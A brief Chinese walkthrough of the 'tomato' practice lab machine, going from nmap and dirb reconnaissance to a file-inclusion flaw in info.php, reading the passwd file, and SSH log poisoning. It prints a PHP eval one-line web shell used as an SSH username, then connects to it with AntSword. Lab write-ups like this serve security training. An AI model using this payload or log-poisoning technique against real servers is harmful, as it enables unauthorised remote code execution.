本文主要是介绍tomato靶场攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1.使用nmap扫描同网段的端口,发现靶机地址
2.访问到主页面,只能看到一个大西红柿
3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image
4.访问我们扫到的地址 ,点金目录里看看有些什么文件
5.看到info.php很熟悉,点进去看看
6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞
7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功
8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机制写入一句话木马
"<?php @eval($_POST[cmd]);?>"@172.16.1.200 -p 2211
9.写入之后使用蚁剑连接
这篇关于tomato靶场攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!